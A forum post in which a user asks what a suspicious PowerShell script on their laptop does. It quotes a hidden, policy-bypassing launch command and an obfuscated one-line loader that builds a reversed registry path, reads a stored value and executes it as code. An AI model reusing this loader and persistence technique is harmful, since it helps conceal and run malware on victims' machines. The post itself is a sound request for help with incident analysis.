What does this script do?

For the past week or two, I've noticed that my laptop has been overheating and running slowly. When I checked Task Manager, I saw that two PowerShell instances were using up around 80% of my RAM and CPU. At first, I ran the Windows antivirus scan, but it didn't detect any malicious files. So, I ignored it and just ended the instances whenever they appeared.

However, the problem persisted, and I recently discovered that the PowerShell instances were running a script located at "C:\Windows\System32\68D0.tmp\68D1.tmp.ps1". Here's the PowerShell command:

"powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Windows\System32\68D0.tmp\68D1.tmp.ps1"

The 68D1.tmp.ps1 file content:

$nAQtLXMOJiHutd=[ScriptBlock]; icm ($nAQtLXMOJiHutd::Create([string]::Join('', ((gp (([regex]::Matches('VQ3y9RP0iswodniW\ERAWTFOS:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'9AfXBVLS' | % { [char]$_ }))))

I don't know much about hacking, but it looks like some kind of base64 encoded text to me. I deleted the folder, but I'm curious about what this script does. If anyone has any insights, I'd appreciate it. Also, this is just my secondary laptop, so there aren't any important files on it, just some study notes and lectures. Thank you!

submitted by /u/aditya_senpai396

from hacking: security in practice https://ift.tt/SUdop2n
